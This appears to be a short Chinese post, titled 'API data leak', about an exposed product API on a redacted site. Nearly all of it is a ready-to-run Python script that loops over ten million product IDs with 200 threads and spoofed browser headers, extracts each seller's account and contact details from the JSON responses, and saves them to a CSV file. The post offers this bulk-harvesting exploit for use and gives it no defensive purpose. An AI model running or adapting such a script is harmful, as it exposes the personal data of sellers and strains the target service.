API数据泄露

https://www.XXXX.com/api/YYYYYYYY/item-ajax_product_basic-30513311.html?output=jsonhttps://www.XXXX.com/api/YYYYYYY/item-3053319.html?output=json

import csvimport osimport requestsfrom concurrent.futures import ThreadPoolExecutor, as_completed# 请求的URL和参数base_url = "https://www.XXXXX/api/XXXXXX/item-ajax_product_basic-{}.html?output=json"params = {"output": "json"}# 请求头headers = {    "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",    "Accept": "application/json",    "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",    "Accept-Encoding": "gzip, deflate, br, zstd",    "Referer": "https://XXXXXXX",    "Content-Type": "application/json",    "Sec-Fetch-Dest": "empty",    "Sec-Fetch-Mode": "cors",    "Sec-Fetch-Site": "same-origin",    "Connection": "keep-alive",    "Priority": "u=4"}# CSV文件名和ID范围file_name = "user_data.csv"start_id = 1end_id = 10000000# 读取已存在的用户IDexisting_ids = set()if os.path.exists(file_name):    with open(file_name, "r", newline="", encoding="utf-8") as csvfile:        reader = csv.DictReader(csvfile)        for row in reader:            existing_ids.add(row["account_id"])# 多线程请求函数def fetch_and_save(id):    url = base_url.format(id)    try:        response = requests.get(url, params=params, headers=headers, timeout=10)        if response.status_code == 200:            json_data = response.json()            if "error" not in json_data or json_data["error"] != "商品不存在":                print(f"ID: {id} - 请求成功: {url}")                # 提取两组数据                pam_account = json_data["data"]["seller_info"]["pam_account"]                contact = json_data["data"]["seller_info"]["contact"]                # 合并两组数据                combined_data = {**pam_account, **contact}  # 使用字典合并                current_account_id = pam_account["account_id"]                if current_account_id not in existing_ids:                    # 获取所有字段名（合并后的字段）                    fieldnames = list(combined_data.keys())                    # 写入CSV文件                    with open(file_name, "a", newline="", encoding="utf-8") as csvfile:                        writer = csv.DictWriter(csvfile, fieldnames=fieldnames)                        if csvfile.tell() == 0:  # 如果文件是新的，写入表头                            writer.writeheader()                        writer.writerow(combined_data)                        existing_ids.add(current_account_id)  # 更新已存在的ID        else:            print(f"ID: {id} - 请求失败，状态码：{response.status_code}")    except requests.exceptions.RequestException as e:        print(f"ID: {id} - 请求过程中发生错误：{e}")# 使用线程池并发执行def main():    with ThreadPoolExecutor(max_workers=200) as executor:        futures = [executor.submit(fetch_and_save, id) for id in range(start_id, end_id + 1)]        for future in as_completed(futures):            try:                future.result()            except Exception as e:                print(f"线程执行中发生错误：{e}")if __name__ == "__main__":    main()